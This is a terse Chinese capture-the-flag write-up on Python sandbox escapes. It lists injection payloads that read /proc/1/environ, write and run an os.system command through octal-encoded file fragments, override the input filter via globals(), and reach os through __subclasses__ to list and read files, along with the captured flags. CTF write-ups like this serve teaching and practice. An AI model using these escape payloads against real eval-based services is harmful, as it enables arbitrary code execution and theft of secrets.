Python沙箱逃逸,闭合之后open直接读environ得到flag
{13212}'+(print(open('/proc/1/environ').read()))+' 或者使用payload:{print(open("/proc/1/environ").read())}
flag{61e81b4f-566c-49f5-84dd-d79319fddc82}Pyjail ! It's myRevenge !!!Python沙箱逃逸
用write写文件import os;os.system(“nl fl* >hzy”)执行之后再用read读取执行内容得到flag
过滤字符全用八进制绕过,分段写
{13212}'+(open('wsy', "a").write('151155160157162'))+'{13212}'+(open('wsy', "a").write('t 157'))+'{13212}'+(open('wsy', "a").write('163;157'))+'{13212}'+(open('wsy', "a").write('163.'))+'{13212}'+(open('wsy', "a").write('163y'))+'{13212}'+(open('wsy', "a").write('st'))+'{13212}'+(open('wsy', "a").write('em("nl 146*>hzy")'))+'{13212}'+open('143157de.py','w').write(open('wsy').read())+'{13212}'+(print(open('hzy').read()))+'或者依次执行下面poc:{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#{globals().update(dict(len=lambda x:0))}''{in''put()}'#{print("".__class__.__mro__[1].__subclasses__()[137].__init__.__globals__["__builtins__"]["__import__"]("os").listdir())}['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']{globals().update(dict(my_filter=lambda x:1))}''{in' 'put()}'# {globals(). update(dict(len=lambda x:0))}''{in' 'put()}'#{print (open("flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104"). read())}
flag{8f0a4ac2-52d3-4adb-a1a3-47e05997817d}Wabby Wabbo Radiof12可以拿到wav的